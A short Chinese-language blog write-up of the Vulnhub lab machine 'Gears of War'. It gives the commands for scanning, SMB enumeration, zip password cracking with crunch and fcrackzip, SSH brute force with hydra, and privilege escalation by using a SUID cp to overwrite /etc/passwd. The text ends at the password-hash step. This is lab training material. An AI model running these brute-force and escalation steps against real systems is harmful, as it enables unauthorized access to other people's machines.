前言
- Vulnhub刷题简单记录
GEARS OF WAR
描述
GEARS OF WAR开始
1、可以用两种方法确认靶场的存在,扫ip
1 | netdiscover -i eth0 -r 192.168.1.0/24 |
2、扫目标端口开发情况
1 | nmap -sV -sC -A 192.168.1.108 |
3、访问主页,根据提示说有一个password_resets,我们扫一下目录情况
1 | gobuster dir -u http://192.168.1.104/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 200 |
4、这题主要是搞445端口安全,就不管网站了,接着用get命令获取其中的文件
1 | smbmap -H 192.168.56.103 -R |
5、访问获取的文件,得到一个信息,让我们按照下面的字符解压缩包的密码
1 | ┌──(root💀kali)-[~/BC/war] |
可以分析出来,这是用crunch来撞密码,他给出了特殊格式,用下面命令生成密码
1、@代表小写字母
2、%代表数字
3、逗号代表大写字符
1 | crunch 4 4 -t @%%, -o words |
6、接着用fcrackzip破解密码 r44M
1 | fcrackzip -D -v -u msg_horda.zip -p words |
7、访问keys.txt获取
1 | ┌──(root💀kali)-[~/BC/war] |
8、通过我们前面用 enum4linux -r枚举出的用户,然后进行爆破登陆
1 | hydra -L user.txt -p 3_d4y ssh://192.168.56.103 |
直接ssh登陆
1 | ssh marcus@192.168.56.103 -t "bash -noprofile" |
9、提权,老方法了,suid,先搜索可用的suid文件
1 | find /bin -type f -perm -u=s 2>/dev/null |
发现cp明显很可以用来覆盖/etc/passwd的文件来添加root的权限用户
①先用openssl生成一个用户加盐的真实密码
1 | openssl passwd -1 -salt gylq 123456 |
我的个人博客
孤桜懶契:http://gylq.gitee.io